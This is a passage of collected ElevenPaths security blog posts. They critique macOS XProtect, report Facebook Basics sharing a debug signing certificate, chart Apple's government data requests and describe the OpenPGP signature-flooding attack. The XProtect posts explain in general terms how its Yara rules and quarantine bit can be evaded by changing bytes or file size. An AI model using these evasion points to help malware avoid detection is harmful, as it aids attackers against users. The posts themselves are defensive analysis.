mdworker_share module is sometimes detected as a false positive). Again as a curiosity, a thousand samples in about 70 days gives us an average of almost 15 samples uploaded to VirusTotal per day. Most samples are detected because they are the decryption script showed in the image above. This is an early stage of the attack, which may be positive. Conclusions Indeed, it seems that XProtect (in a totally opaque way) has moved up a gear and in a few days has created more detection rules than ever. These rules are hunting a lot of malware at their earliest stage, and even do a better job than antiviruses. Nevertheless, we have a big "but". The rules are late and, in addition, open to the attacker. They will be tempted to go unnoticed just by looking at what XProtect detects and modifying when necessary. This doesn’t mean they are bad, but easily bypassable. For example, if we analyze some of the strings on which they rely to detect malware, we see how it does it: Example of one of the 14 Yara rules introduced Whose strings may be translated into this: They in turn are commands usually used by malware, and by simply modifying one byte the rules could be bypassed.
February 3, 2020
Cyber Security
Facebook signed one of its apps with a private key shared with other Google Play apps since 2015
Facebook Basics is a Facebook app aimed at countries with poor connectivity, where a free access service to WhatsApp and Facebook is provided. It has been discovered that the Android version used a “Debug” certificate shared by other unrelated applications and in other markets. Moreover, within ElevenPaths we have verified that since 2015 such certificate was shared with Chinese apps on Google Play. This means that they shared private key and could even influence the original app. A few days ago, the owner of the Android Police page reported that the same certificate used to sign the app Facebook Basics was being used by many other apps in other markets, with no apparent relationship. Facebook has downplayed the issue by claiming that there is no evidence that the certificate has been exploited and that it has already been fixed. However, this is not so simple, so both consequences and potential causes are only bad news. Causes Android APKs must be signed with self-signed certificates. This breaches a little bit any rule from a chain of trust, but at least it preserves the integrity of the app and allows its updating. If you sign an app with a certificate and upload it to Google Play, you will never be able to change the certificate (or the package name) if you wish to update it. If you lose the certificate, you will have to create a different appꟷand this is what Facebook has done to "fix it". Nevertheless, Facebook has not (supposedly) lost the private key of the signing certificate. They have done something different (worse?) what we can only speculate about. To begin with, they have used an ‘Android Debug’ certificate without real filled data. This, in addition to the bad image, means that they have left the typical test certificate at the production stage. How is it possible that third parties use this certificate? This certificate might be public. There are some cases, and some developers use it by ignorance or because they do not make efforts to develop high-quality apps... But they may have lost control over this certificate as well, which would imply a lack of security over its development. Another possibility is that the app had been commissioned to a third party (freelance?) and this one worked on it later by signing with the same key (which is strongly inadvisable). Furthermore, from ElevenPaths we have ascertained that the apps signed with the same certificate were not exclusively in other markets, but that already in 2015 (when Facebook Basics was released) we found Chinese applications signed and already taken down from the market. * App: af739e903e97d957a29b3aeaa7865e8e49f63cb0 Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-09-20 to 2016-10-07. * App: 063371203246ba2b7e201bb633845f12712b057e Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-10-21 to 2016-06-22. * App: c6a93efa87533eeb219730207e5237dfcb246725 Signed with: 5E8F16062EA3CD2C4A0D547876BAA6F38CABF625 On Google Play from approximately 2015-09-15 to 2015-09-16. Impact In addition to the poor image of Facebook (is there any area where privacy has not been brought into question?), an attacker could have taken advantage of this to fraudulently update the app of Facebook. How? Well, to update an app it just needs to have the same certificate and it is only necessary to have access to the Google Play account. It's not easy, but with this Facebook was doing half the work to be performed by an attacker. Moreover, the work to perform a potential collusion attack in Android applications would be facilitated as well. These are well-known attacks involving different applications which are not malicious by themselves but working together may lead to an attack. An example is by adding permissions of two applications so that together the attacker can have more power on the phone, even if individually they seem harmless. To achieve this kind of attacks, such apps must be signed with the same certificate. Again, the necessary work was being provided to a potential attacker. On top of all this, Facebook did not want to reward the discoverer because he made it public on Twitter before reporting the issue.
September 9, 2019
Cyber Security
A government is known by the Apple data it requests
Sometimes, governments need to be underpinned by huge corporations to carry out their work. When a threat depends on knowing the identity or gaining access to a potential attacker or a victim in danger’s data, digital information stored by these companies may be critical to perform an investigation and consequently avoid a disaster. Apple has published a full transparency report on government requests where they explain which and the extent to which such requests are granted. Ranging from App Store takedown requests to account access requests: Which government requests what? In order to make it clear, we have created a number of graphs to identify through this post what concerns governments most. Device-based Requests The following graph represents those requests based on devices. For instance, when law enforcement agencies are working on behalf of customers regarding lost or stolen devices. They also receive requests related to fraud investigations. Device-based requests generally seek details of Apple customers associated with devices or device connections to Apple services (for example, a serial number or IMEI number). Device Requests by country Without a doubt, China is the country that most requests on details of customers associated with devices or device connections to Apple services submitted. We can imagine as well that divs have soared due to piracy and fraud in the country. Financial Identifier-based Requests Examples of such requests are where law enforcement agencies are working on behalf of customers who have requested assistance regarding suspected fraudulent credit or gift card activity used to purchase Apple products or services. Financial Identifier Requests by country The U.S. and Germany are the countries that most financial identifier requests submitted. It may be explained by the increasing number of frauds in the U.S. related to credit cards (although it may not seem the case, in the U.S. credit card signatures are still usual to validate a payment). In this case requests are granted to a lesser extent, compared with the previous case. Account-based Requests Examples of such requests are where law enforcement agencies are working on cases where they suspect an account may have been used unlawfully or in violation of Apple’s terms of service. They usually seek details of customers’ iTunes or iCloud accounts, such as a name and address; and in certain instances, customers’ iCloud content (iOS device backups, stored photos, contacts…). Account Requests by country This is perhaps the most intrusive measure, since Apple provides private content. Again, China and the U.S. are the countries that most accounts requests submitted. Interestingly, China’s requests were granted in 98% of cases, while U.S.’s ones “only” in 88% of cases. Apple has the power to reject a request if they consider there is a problem of form or content. It must be taken into account that Apple, in addition to providing data, can also providing metadata not directly linked with data. This case is not considered a “granted” request, although it includes providing information as well. Account Preservation-based Requests Under the U.S. Electronic Communications Privacy Act (ECPA), government agencies may request Apple to freeze accounts for 90-180 days. This is the previous step before requesting access to accounts (while they obtain legal permission to request data), and this way they prevent the individual under investigation from deleting the account. Account Preservation Requests by country The U.S. is the country that most account preservation requests submitted. It is remarkable that on this occasion China has disappeared from the graph, although it is considered a previous step before requesting access to accounts, where the country is quite active. Is it possible that China does not find many problems to obtain legal permission? Account Restriction/Deletion Requests Examples of such requests are where government agencies request to delete a customer’s Apple ID, or to restrict access. They are quite unusual. The U.S. submitted 6 requests and 2 of them were granted. The remaining countries just submitted one or two, but none was granted. Account Restriction/Deletion Requests by country Emergency Requests Under the U.S. Electronic Communications Privacy Act (ECPA) as well, Apple may be requested to disclose account information to a government entity in emergency situations if Apple considers that an emergency involving imminent danger of death or serious physical injury to any person requires such disclosure without delay. Emergency Requests by country Interestingly, here the winner is the United Kingdom with 198 requests, even though they were not always granted; and it was closely followed by the U.S. The remaining countries submitted around 10 requests, and most of them were rejected. Is the United Kingdom mainly worried about emergencies and consequently it only requests data in such a case? App Store Takedown Requests They are usually related to apps that are supposed to be unlawful. App Store Takedown Requests by country China is far and away the country that most app store takedown requests submitted. It is curiously followed by Norway, Saudi Arabia and Switzerland. On this occasion, the U.S. ꟷquite active on data access requests in generalꟷ has completely disappeared from the graph. This report also discusses private party requests upon legal request. Up to 181 requests; 53 of them granted by Apple on information access. Conclusions They are complex. We can see it from two different points of view: we can conclude that some governments request data access “all too often”, but we could argue as well that perhaps justice systems of such countries work in a more agile and effective manner, or that fraud is mostly located in them. You can interpret it as you wish. Only the following data-based conclusions seem to be clear: China’s interest in deleting applications that it considers unlawful. The United Kingdom’s involvement (the U.S. as well, but the UK only appears in this category) in emergency situations. The U.S.’s preventive actions, since it requests to freeze accounts much more often than the remaining countries. Germany’s high involvement (again, along with the U.S.) in financial frauds related to Apple products. China, the U.S., Taiwan and Brazil are the countries that most personal data requested. Please note that: over this post we have represented those graphs published by Apple itself. It is important to point out that all requests are submitted by batches. For instance, Apple counts the number of app store takedown requests, and in turn each request may include an undetermined number of apps. The same for account requests and the number of accounts included in the request. When Apple talks about the percentage of granted requests, it talks about requests, not about specific accounts. For example, Apple receives 10 requests, all of them adding 100 accounts. Later, it states that it has granted 90% of those requests, but we do not know how many individual accounts have been provided. However, the graphs show the total amount against that percentage. Even though it is not an exact exercise, it may give us an approximate idea of the real amount of data provided.
July 8, 2019
Cyber Security
The attack against OpenPGP infrastructure: consequences of a SOB’s actions
What is happening with the attack against OpenPGP infrastructure constitutes a disaster, according to the affected people who maintain the protocol. Robert J. Hansen, who communicated the incident, has literally described the attacker as a ‘son of a bitch’, since public certificates are being vandalized by taking advantage of essentially two functionalities that have become serious problems. A little of background knowledge On peer-to-peer public certificate networks, where anyone may find the PGP public key of someone else, nothing is ever deleted. This was decided in the 90s by design in order to withstand potential attacks from those governments wishing to censure. Let us remember that the whole free encryption movement was born as an expression of ‘rebelliousness’, precisely due to the highest’s circles attempt to dominate cryptography. Since there is no centralized certification authority, PGP is based on something much more horizontal. They are the users themselves who sign a certificate attesting that it belongs to the user in question. Anyone can a sign a public certificate, attesting that it belongs to who it states to belong. By the 90s, people met to swap floppy disks with their signatures so that others may sign their public keys, whether they knew each other or not. The spread of the Internet brought along a server network hosting public keys. There, you may find the keys and, if appropriate, also sign one attesting that it belongs to the individual in question. Anyone can sign them an unlimited number of times, attesting with its own signature that the certificate belongs to who it states to belong. This attaches a signature of a given number of bytes to the certificate. Forever. The attack The attack that is being performed consists in signing thousands of times (up to 150,000 signatures per hour) public certificates and uploading them to the peer-to-peer certificate networks, from where they will never be deleted. In practice, valid certificates start to have a size of several tens of megabytes soon after. They are signed without data, as you can see in the following imagen. So far they have been focused on attacking two relevant persons from the OpenPGP movement guild: Robert J. Hansen and Daniel Kahn Gillmor. The problem here is that under these circumstances, Enigmail and any OpenPGP implementation simply stop working or take very long time to process such oversized certificates (several tens of megabytes slow down the process up to tens of minutes). For example, 55,000 signatures for a certificate of 17 megabytes. In practice, this disables the keyring. Anyone wishing to verify Daniel or Robert’s signatures will break their installation while importing them. He considers himself an “occasional programmer” of this language, although we hope that it is just a modesty exercise Consequently, the attack takes advantage of two circumstances difficult to be addressed (they are features by design), so it’s pure vandalism: The fact that there is no limitation on the number of signatures. If there were any, it will pose a problem as well, since the attacker may reach the limit of trusting signatures of a certificate and this way prevent anyone from trusting it again. SKS servers replicate the content, and achieving it is part of the design in case an agency may intervene. This way, what is made cannot be deleted. Why has not it been fixed? The synchronizing network system called Synchronizing Key Server is open source, but in practice it is unmaintained. It was created as the keystone of Yaron Minsky’s Ph.D thesis, and it is written in an programming language called OCaml. As strange as it may sound, no one knows how it works so it would be necessary not only to address it, but to question the design itself as well. Solutions are being reported: don’t refresh the affected keys and other mitigations, or refresh them from the server keys.openpgp.org, that implements a number of constraints on the problem in exchange for losing other functionalities. According to Hansen himself: the current network is unlikely to be saved. But the worst may be yet to come. Software packages in distribution repositories are usually signed with OpenPGP. What if they start to attack these certificates? Software updates from distributions may become really slow and useless. It endangers the updating of systems that may be critical. This may suppose a call effect for other attackers, since exploiting the flaw is relatively simple. Conclusions? It was already known that the network could be misused, but no one expected such a wanton vandalized action. According to the affected people, they cannot understand its purpose if it’s not destroying the altruist work of people that attempt to make encryption an unlimited right. Defeatism may be perceived from affected people’s messages, where they show their frustration, anger and somewhat pessimism, with sentences such as “this is a disaster that could be foreseen”, “there is no solution”, etc. This final sentence is devastating: But if you get hit by a bus while crossing the street, I’ll tell the driver everyone deserves a mulligan once in a while. You fool. You absolute, unmitigated, unadulterated, complete and utter, fool. Peace to everyone — including you, you son of a bitch. (Mulligan refers to a “second opportunity” in the golf jargon). A number of points have caught our attention: The fact that the core code of the network is written in a such an unknown language, and that it has been hardly ever maintained since then, precisely because of its perfect functioning. The fact that gnuPG (the OpenPGP implementation) or Enigmail (that after all uses genuPG) cannot work with certificates of several megabytes is at least surprising. Their capacity to handle databases is quite poor. It reminds us what happened with OpenSSL after HeartBleed. Tens of defects started to be detected within the code, so the programmers admitted in some way that they could not spend more time on auditing the code. Solutions such as LibreSSL were born to attempt to program a more secure TLS implementation. Daniel Kahn himself admits it: “As an engineering community, we failed”. This damages the image of PGP in general, that is not in very good health. And this strong blow only endangers its whole image, not only its servers (these ones being the excuse for the attack). It is an interesting issue due to several reasons that lead to a number of unknowns: What is going to happen with OpenPGP in general; with protocol itself; with its more common implementations; with the servers… And above all, what the attacker’s plan is (or the call effect that may cause more attacks): if it will go from personal certificates to those that sign packages, or how distributions will react.
July 1, 2019
Cyber Security
How the "antimalware" XProtect for MacOS works and why it detects poorly and badly
Recently, MacOS included a signature in its integrated antivirus, intended to detect a binary for Windows; but, does this detection make sense? We could think it does, as a reaction to the fact that in February 2019 Trend Micro discovered malware created in .NET for Mac. It was executed by the implementation of Mono, included in the malware itself to read its own code. Ok, but now seriously, does it make sense? It might make sense to occasionally include a very particular detection that has been disseminated through the media, but in general the long-term strategy of this antivirus is not so clear, although it is intended to detect "known" malware. The fight that MacOS as a whole has against malware is an absolute nonsense. They moved from a categorically deny during the early years of the 21st century to a slight acceptance for finally, since 2009, lightly fight malware. However, since then it has not evolved so much. Let’s continue with the detection of the Windows executable: the malware was detected in February, which means that it had been working for some time. Trend Micro discovered it and the media made it public, bringing down their reputation. On 19 April, Apple included its signature in XProtect. It is an unacceptable reaction time. On top of all this, it was the first XProtect signature update during all 2019. Is it possible that the malware dissemination was related to the signature inclusion? What is the priority level given to user’s security then? Do we know how much malware is detected by XProtect and how often this seldom-mentioned functionality is updated? Are Gatekeeper and XProtect a way in general to spare their blushes or are they really intended to help mitigate potential infections in MacOS? At least, one of the few official websites about XProtect indicates that it is addressed to prevent "known" malware from running (https://support.apple.com/en-in/HT207005). What is what This issue about malware in MacOS is a cyclical, recurrent (and sometimes bored) subject. However, for those who are starting out in security, it is necessary to remind them how dangerous are certain myths that last over time because there are still big "deniers". XProtect is a basic signature-based malware detection system that was introduced in September 2009. It constitutes a first approach to an antivirus integrated into MacOS, and it is so rudimentary that when it was launched it was just capable of identifying two families that used to attack Apple operating system and only analyzed files downloaded from Safari, iChat, Mail and now Messages (leaving out well-known browsers for MacOS such as Chrome or Firefox). Currently, XProtect has some more signatures that may be clearly found (malware name and detection pattern) in this path: /System/Library/CoreServices/XProtect.bundle/Contents/Resources/ XProtect contains signatures on the one hand, and Yara rules on the other hand (it is defined by XProtect.plist and Xprotect.yara on that directory), and with both systems malware is detected and defined. GateKeeper is supported by both; it monitors and sends it them. The list XProtect.plist is open. Number 3 from the URL refers to Mountain Lion. When 2 is modified, Lion signature file may be viewed, and 1 corresponds to Snow Leopard. Apple does not seem keen to talk too much about it. site:support.apple.com xprotect on Google delivers little results. Relation between xprotect.yara and xprotect.plist with some hashes GateKeeper has little to do with malware or antivirus, as sometimes it is said. GateKeeper is a system in place to check that downloaded apps are signed by a known ID. To develop for Apple and publish on App Store, the developer must get (and pay) an ID to sign their programs, a kind of certificate. According to Apple, "The Developer ID allows Gatekeeper to block apps created by malware developers and verify that apps haven't been tampered with since they were signed. If an app was developed by an unknown developer—one with no Developer ID—or tampered with, Gatekeeper can block the app from being installed". Therefore, Gatekeeper is far from being an antimalware. Rather, it is an apps’ integrity, source and authorship controller that, in case it detects something untrustworthy, it will send it to XProtect and keep it in quarantine if it comes from a suspicious site. Moreover, there is also MRT for MacOS. It’s its Malware Removal Tool, very close to the Malicious Software Removal Tool for Windows. It is used to reactively remove malware which was already installed, and it can be only executed on system start-up. As if it were not enough, to perform disinfection it trusts very specific and common infection paths, so little can be done. Why all this does not seem to work too well An avoidable bit to be analyzed: XProtect is a signature-based system (leaving heuristics behind, no trace of advanced analysis system) that actually constitutes the "basis". However, it is affected by all kind of obstacles, preventing it from being effective. GateKeeper is the system that tells XProtect, "I’m going to embed an active quarantine bit into this just downloaded file, let’s see if you detect it". This bit may be simply removed even without privileges, so it would be easy to avoid XProtect basic checking. A poor update in terms of frequency and quantity: for instance, as we are stating in May 2019, XProtect has only been updated two times, with a single signature each one. The first in 2019 took place on 19 April (for the Windows malware previously mentioned), and 10 days later the second one was launched (pushing a rule to detect MACOS.6175e25 within its Yara rules). From 2009 to 2011, it moved from 2 to less than 20 signatures. How many signatures does it have currently? In its 2103 version ˗the latest of May˗ 92 signatures may be counted (gathered over almost 10 years). They are the following ones: "OSX.CrossRider.A","MACOS.6175e25","MACOS.d1e06b8","OSX.28a9883","OSX.Bundlore.D", "OSX.ParticleSmasher.A","OSX.HiddenLotus.A","OSX.Mughthesec.B","OSX.HMining.D", "OSX.Bundlore.B","OSX.AceInstaller.B","OSX.AdLoad.B.2","OSX.AdLoad.B.1","OSX.AdLoad.A", "OSX.Mughthesec.A","OSX.Leverage.A","OSX.ATG15.B","OSX.Genieo.G","OSX.Genieo.G.1", "OSX.Proton.B","OSX.Dok.B","OSX.Dok.A","OSX.Bundlore.A","OSX.Findzip.A","OSX.Proton.A", "OSX.XAgent.A","OSX.iKitten.A","OSX.HMining.C","OSX.HMining.B","OSX.Netwire.A", "OSX.Bundlore.B","OSX.Eleanor.A","OSX.HMining.A","OSX.Trovi.A","OSX.Hmining.A", "OSX.Bundlore.A","OSX.Genieo.E","OSX.ExtensionsInstaller.A","OSX.InstallCore.A", "OSX.KeRanger.A","OSX.GenieoDropper.A","OSX.XcodeGhost.A","OSX.Genieo.D","OSX.Genieo.C", "OSX.Genieo.B","OSX.Vindinstaller.A","OSX.OpinionSpy.B","OSX.Genieo.A","OSX.InstallImitator.C", "OSX.InstallImitator.B","OSX.InstallImitator.A","OSX.VSearch.A","OSX.Machook.A","OSX.Machook.B", "OSX.iWorm.A","OSX.iWorm.B/C","OSX.NetWeird.ii","OSX.NetWeird.i","OSX.GetShell.A", "OSX.LaoShu.A","OSX.Abk.A","OSX.CoinThief.A","OSX.CoinThief.B","OSX.CoinThief.C", "OSX.RSPlug.A","OSX.Iservice.A/B","OSX.HellRTS.A","OSX.OpinionSpy","OSX.MacDefender.A", "OSX.MacDefender.B","OSX.QHostWB.A","OSX.Revir.A","OSX.Revir.ii","OSX.Flashback.A", "OSX.Flashback.B","OSX.Flashback.C","OSX.DevilRobber.A","OSX.DevilRobber.B", "OSX.FileSteal.ii","OSX.FileSteal.i","OSX.Mdropper.i","OSX.FkCodec.i","OSX.MaControl.i", "OSX.Revir.iii","OSX.Revir.iv","OSX.SMSSend.i","OSX.SMSSend.ii","OSX.eicar.com.i", "OSX.AdPlugin.i","OSX.AdPlugin2.i","OSX.Leverage.a","OSX.Prxl.2" Including Eicar and the first XProtect samples of September 2009 (OSX.RSPlug.A, OSX.Iservice). XProtect is based on plain sight Yara rules. Yara is great for analysts to "hunt" for malware, but it is not clear whether it is the best option for detection, particularly when rules are published, making public the detection methods and under what conditions this is done. By doing this, door is being opened for malware writers to simply modify and avoid them. Yara rules must not only be made, but they must be well made by choosing a concrete singularity to avoid false positives and make it difficult for attackers, so that we ensure that by changing any condition they are able to attack without modifying their payload. Particularly, in this regard it stands out how Apple trust filesize to detect malware. They do it because of what we mean by "efficiency". XProtect’s Yara rule that trusts in hash Within this rule, the file is expected to be lower than 3500 bytes (the hash filesize from the example is low, barely 2k) to estimate the hash and this way detect them. Any downloaded file lower than that filesize will be compared to a few hashes, well-known since 2016. Firstly, it discriminates by filesize, and then it detects hash, both variables of little relevance. With the same size structure and hash, we are able to identify 42 of the 92 XProtect’s Yara rules that discriminate by filesize and then trust in hashes to detect malware. They don’t only rely on hash. XProtect’s Yara rules also use significant strings to detect malware, and add the filesize at the end as a key condition to detect it. An example of XProtect’s Yara rule According to this rule, the malware must be a Macho one, contain all the described strings and be lower than 200kb. If it includes all the strings but is higher than 200k, the condition is not matched and would not be detected. Using filesize within Yara rules is not strange or wrong in essence, but in these situations and as a condition for a protection system (not for "hunting"), it does not seem very strong. And with this discriminatory filesize formula, we are able to find 27 (1/3) of the detections that would be avoided by just modifying the filesize. Remember that 42 of them (almost 1/2) would do it, besides, by tampering a single bit of the file. And all this just with 92 signatures in the "database" and only analyzing those programs from very specific channels (Safari, Mail, iChat and Messages). If we wanted to split hairs, we could mention that SHA1 is already considered obsolete to estimate the hash, but it does not matter too much in this context. Conclusions XProtect is not intended to compete against any antivirus, that’s the truth, and is designed to detect known malware. That said, "known malware" is not the same as "known sample". It should cover at least families and not specific files. We should not expect a lot from it, but it must be seen as a first and very thin protection line against threats. However, we think that, even so, it would not accomplish its task. Rules use hashes to detect, they are limited, and malware definitions are always integrated long after the malware has been disseminated through the media. Anybody could claim that maybe these few signatures cover most of the known malware for MacOS, but even if it is not true, its response capability and detection formula paint an unflattering picture of the system in general. Therefore, we cannot expect a real protection, not even reactive, from XProtect. What may be expected then from this MacOS system? Purely and simply making some users feel secure by displaying a reassuring message on their systems in "ideal infection conditions". In their favor, it must be said that at least Apple is not Android (with a detection system as Play Protect, that is ineffective, but at least can be justified) but above all because if at least all users strictly download from Apple Store, there are some guarantees. Unlike Google Play and although its store is not free from malware, Apple Store is quite secure, as iOS and its applications are. So now the eternal question that deniers like so much. Do you need an antimalware in your MacOS? We could answer yes, we do, but not XProtect. Do not feed the fire, but nor the myths. Sergio de los Santos Innovation and Labs (ElevenPaths) ssantos@11paths.com @ssantosv
May 6, 2019